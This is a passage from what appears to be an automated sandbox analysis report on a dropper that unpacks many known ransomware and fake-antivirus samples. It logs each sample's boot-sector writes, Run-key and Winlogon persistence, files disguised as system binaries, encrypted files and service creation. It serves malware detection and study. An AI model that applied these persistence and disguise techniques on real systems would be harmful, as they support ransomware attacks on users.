        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeCode function: 11_2_0040E108 push ecx; mov dword ptr [esp], edx11_2_0040E10D
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeCode function: 11_2_0040F12C push 0040F158h; ret 11_2_0040F150
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeCode function: 11_2_00417184 push 004171AAh; ret 11_2_004171A2
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeCode function: 11_2_004053E0 push 00405431h; ret 11_2_00405429
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeCode function: 11_2_0040E49E push 0040E8ECh; ret 11_2_0040E8E4
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeCode function: 11_2_004135E0 push ecx; mov dword ptr [esp], ecx11_2_004135E5
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeCode function: 11_2_0040059D push es; ret 11_2_004005C9
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeCode function: 11_2_00405648 push 00405674h; ret 11_2_0040566C
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeCode function: 11_2_00407668 push dword ptr [eax+6Ch]; ret 11_2_0040766B
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeCode function: 11_2_0040766C push dword ptr [eax+6Ch]; ret 11_2_004076A0
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeCode function: 11_2_00405610 push 0040563Ch; ret 11_2_00405634
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeCode function: 11_2_0040E770 push 0040E8ECh; ret 11_2_0040E8E4
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeCode function: 11_2_004087B4 push 0040880Ah; ret 11_2_00408802
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeCode function: 11_2_00411858 push 004118CEh; ret 11_2_004118C6
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeCode function: 11_2_00406808 push dword ptr [edx+04h]; ret 11_2_00406817
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeCode function: 11_2_0040880C push 00408839h; ret 11_2_00408831
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeCode function: 11_2_0040883C push 00408B38h; ret 11_2_00408B30
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeCode function: 11_2_004118D0 push 00411978h; ret 11_2_00411970
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeCode function: 11_2_0040E8EE push 0040E95Fh; ret 11_2_0040E957
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeCode function: 11_2_0040E8F0 push 0040E95Fh; ret 11_2_0040E957
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeCode function: 11_2_0041197A push 00411A20h; ret 11_2_00411A18
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeCode function: 11_2_004059D0 push 004059FCh; ret 11_2_004059F4
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeCode function: 11_2_004119F4 push 00411A20h; ret 11_2_00411A18
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeCode function: 11_2_00405996 push 004059C4h; ret 11_2_004059BC
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeCode function: 11_2_00405998 push 004059C4h; ret 11_2_004059BC
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeCode function: 11_2_00411A57 push 00411AA5h; ret 11_2_00411A9D
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeCode function: 11_2_00411A58 push 00411AA5h; ret 11_2_00411A9D
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeCode function: 11_2_00405A08 push 00405A34h; ret 11_2_00405A2C
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeCode function: 11_2_00402ACC push eax; ret 11_2_00402B08
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeCode function: 11_2_00411AA9 push 00411ADCh; ret 11_2_00411AD4
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_04779016 VirtualProtect,LoadLibraryA,GetProcAddress,VirtualProtect,12_2_04779016
        Source: Endermanch@AntivirusPro2017.exe.0.drStatic PE information: section name: .data2
        Source: Endermanch@HappyAntivirus.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1ed7f7
        Source: Endermanch@WannaCrypt0r.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x363012
        Source: Endermanch@PolyRansom.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x4214c
        Source: Endermanch@AntivirusPro2017.exe.0.drStatic PE information: real checksum: 0x0 should be: 0xcfabb
        Source: 1jDe7zWnoe.exeStatic PE information: real checksum: 0x0 should be: 0x2ba87
        Source: Endermanch@DeriaLock.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x82848
        Source: Endermanch@Xyeta.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x18075
        Source: Endermanch@AntivirusPlatinum.exe.0.drStatic PE information: real checksum: 0x21337 should be: 0xc4420
        Source: Endermanch@ViraLock.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x3a0f8
        Source: Endermanch@WinlockerVB6Blacksod.exe.0.drStatic PE information: real checksum: 0x1676f6 should be: 0x26f735
        Source: Endermanch@NoMoreRansom.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1624e8
        Source: WindowsUpdate.exe.21.drStatic PE information: real checksum: 0x0 should be: 0xf22f
        Source: Endermanch@Krotten.exe.0.drStatic PE information: real checksum: 0x13aae should be: 0xee00
        Source: Endermanch@Antivirus.exe.0.drStatic PE information: real checksum: 0x200061 should be: 0x206fc7
        Source: csrss.exe.39.drStatic PE information: real checksum: 0x0 should be: 0x1624e8
        Source: Endermanch@InfinityCrypt.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x3cd67
        Source: Endermanch@Birele.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x22594
        Source: Fantom.exe.0.drStatic PE information: real checksum: 0x23bfb should be: 0x42811
        Source: Endermanch@AnViPC2009.exe.0.drStatic PE information: real checksum: 0x236e4 should be: 0x12f8ba
        Source: initial sampleStatic PE information: section name: .text entropy: 7.961089181833591
        Source: initial sampleStatic PE information: section name: .text entropy: 7.3467930766155956
        Source: initial sampleStatic PE information: section name: .text entropy: 7.193641199482148
        Source: initial sampleStatic PE information: section name: .text entropy: 7.848405878864468
        Source: initial sampleStatic PE information: section name: .text entropy: 7.995168937044817
        Source: initial sampleStatic PE information: section name: .text entropy: 6.9446307309914985
        Source: initial sampleStatic PE information: section name: .text entropy: 7.3467930766155956
        Source: initial sampleStatic PE information: section name: UPX0
        Source: initial sampleStatic PE information: section name: UPX1
        Source: initial sampleStatic PE information: section name: UPX0
        Source: initial sampleStatic PE information: section name: UPX1

        Persistence and Installation Behavior

        barindex
        Source: C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 512 length: 512
        Source: C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 512 length: 512
        Source: C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 512 length: 512
        Source: C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 8192 length: 8192
        Source: C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 512 length: 512
        Source: C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 512 length: 512
        Source: C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 512 length: 512
        Source: C:\Windows\SysWOW64\rundll32.exeExecutable created and started: C:\Windows\EF39.tmpJump to behavior
        Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows\dispci.exe
        Source: C:\Users\user\AppData\Local\Temp\101awtpm.1qs\Endermanch@NoMoreRansom.exeFile created: C:\ProgramData\Windows\csrss.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 512
        Source: C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 512
        Source: C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 512
        Source: C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 512
        Source: C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 512
        Source: C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 512
        Source: C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 0
        Source: C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 0
        Source: C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 0
        Source: C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 0
        Source: C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 0
        Source: C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 0
        Source: C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 0
        Source: C:\Users\user\AppData\Local\Temp\101awtpm.1qs\Endermanch@NoMoreRansom.exeFile created: C:\ProgramData\Windows\csrss.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeFile created: C:\ProgramData\vsMwMYIk\LOAcQQUU.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\zfaio0hk.qy4\Endermanch@WinlockerVB6Blacksod.exeFile created: C:\Users\user\AppData\Local\Temp\shiAB02.tmpJump to dropped file
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeFile created: C:\Users\user\AppData\Local\Temp\qi2imphp.fcp\Endermanch@Xyeta.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeFile created: C:\Users\user\fakAAcAY\dekAkckQ.exeJump to dropped file
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeFile created: C:\Users\user\AppData\Local\Temp\tkkkfnat.fk3\Endermanch@AntivirusPlatinum.exeJump to dropped file
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeFile created: C:\Users\user\AppData\Local\Temp\yz5ggchg.xck\Endermanch@Krotten.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\101awtpm.1qs\Endermanch@NoMoreRansom.exeFile created: C:\ProgramData\Windows\csrss.exeJump to dropped file
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeFile created: C:\Users\user\AppData\Local\Temp\hntwffjp.nvh\Endermanch@Antivirus.exeJump to dropped file
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeFile created: C:\Users\user\AppData\Local\Temp\nsduntxl.sn0\Endermanch@FakeAdwCleaner.exeJump to dropped file
        Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\cscc.datJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\zfaio0hk.qy4\Endermanch@WinlockerVB6Blacksod.exeFile created: C:\Users\user\AppData\Roaming\Windows\Error file remover 1.0.0.0\install\decoder.dllJump to dropped file
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeFile created: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeJump to dropped file
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeFile created: C:\Users\user\AppData\Local\Temp\vizhwbnh.yaz\Endermanch@BadRabbit.exeJump to dropped file
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeFile created: C:\Users\user\AppData\Local\Temp\101awtpm.1qs\Endermanch@NoMoreRansom.exeJump to dropped file
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeFile created: C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exeFile created: C:\Users\user\AppData\Local\Temp\WindowsUpdate.exeJump to dropped file
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeFile created: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeJump to dropped file
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeFile created: C:\Users\user\AppData\Local\Temp\1q3rmbaq.p1f\Endermanch@AntivirusPro2017.exeJump to dropped file
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeFile created: C:\Users\user\AppData\Local\Temp\ca1jm2wg.yla\Endermanch@HappyAntivirus.exeJump to dropped file
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeFile created: C:\Users\user\AppData\Local\Temp\zfaio0hk.qy4\Endermanch@WinlockerVB6Blacksod.exeJump to dropped file
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeFile created: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeJump to dropped file
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeFile created: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\zfaio0hk.qy4\Endermanch@WinlockerVB6Blacksod.exeFile created: C:\Users\user\AppData\Roaming\Windows\Error file remover 1.0.0.0\install\0A01606\fatalerror.exeJump to dropped file
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeFile created: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeJump to dropped file
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeFile created: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeFile created: C:\ProgramData\vsMwMYIk\LOAcQQUU.exeJump to dropped file
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeFile created: C:\Users\user\AppData\Local\Temp\m0evjtwp.r3z\Endermanch@AnViPC2009.exeJump to dropped file
        Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\dispci.exeJump to dropped file
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeFile created: C:\Users\user\AppData\Local\Temp\bsejfx0c.zjs\Endermanch@ViraLock.exeJump to dropped file
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeFile created: C:\Users\user\AppData\Local\Temp\nuxubd5j.5lo\Endermanch@WannaCrypt0r.exeJump to dropped file
        Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\cscc.datJump to dropped file
        Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\dispci.exeJump to dropped file

        Boot Survival

        barindex
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run dekAkckQ.exe
        Source: C:\Users\user\AppData\Local\Temp\101awtpm.1qs\Endermanch@NoMoreRansom.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Client Server Runtime Subsystem
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run systemJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegal
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 0
        Source: C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 0
        Source: C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 0
        Source: C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 0
        Source: C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 0
        Source: C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 0
        Source: C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exeFile written: \Device\Harddisk0\DR0 offset: 0
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LOGON.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini.AAB132EA333C275065A60A73435181F73B4DDCA1A50057D9334D6FC274E8027C
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java\Get Help.url.AAB132EA333C275065A60A73435181F73B4DDCA1A50057D9334D6FC274E8027C
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java\Visit Java.com.url.AAB132EA333C275065A60A73435181F73B4DDCA1A50057D9334D6FC274E8027C
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini.AAB132EA333C275065A60A73435181F73B4DDCA1A50057D9334D6FC274E8027C
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini.AAB132EA333C275065A60A73435181F73B4DDCA1A50057D9334D6FC274E8027C
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini.AAB132EA333C275065A60A73435181F73B4DDCA1A50057D9334D6FC274E8027C
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini.AAB132EA333C275065A60A73435181F73B4DDCA1A50057D9334D6FC274E8027C
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini.AAB132EA333C275065A60A73435181F73B4DDCA1A50057D9334D6FC274E8027C
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini.AAB132EA333C275065A60A73435181F73B4DDCA1A50057D9334D6FC274E8027C
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LOGON.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\yz5ggchg.xck\Endermanch@Krotten.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\LanmanServer\Parameters
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run systemJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run systemJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\101awtpm.1qs\Endermanch@NoMoreRansom.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Client Server Runtime Subsystem
        Source: C:\Users\user\AppData\Local\Temp\101awtpm.1qs\Endermanch@NoMoreRansom.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Client Server Runtime Subsystem
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run dekAkckQ.exe
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run dekAkckQ.exe
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_04779534 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,GetLastError,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,OpenSCManagerW,memset,GetSystemTimeAsFileTime,wsprintfW,CreateServiceW,StartServiceW,GetLastError,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,DeleteFileW,WNetCancelConnection2W,SetLastError,12_2_04779534

        Hooking and other Techniques for Hiding and Protection

        barindex
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeCode function: 11_2_00416FDD RegisterHotKey 00000000,00000001,00000001,00000009,00000000,windowssecurity11_2_00416FDD
        Source: C:\Users\user\AppData\Local\Temp\yz5ggchg.xck\Endermanch@Krotten.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced Start_ShowRun
        Source: Endermanch@NoMoreRansom.exe, 00000027.00000002.526568195.0000000000400000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: onion-port
        Source: C:\Users\user\AppData\Local\Temp\yz5ggchg.xck\Endermanch@Krotten.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer NoDesktop
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
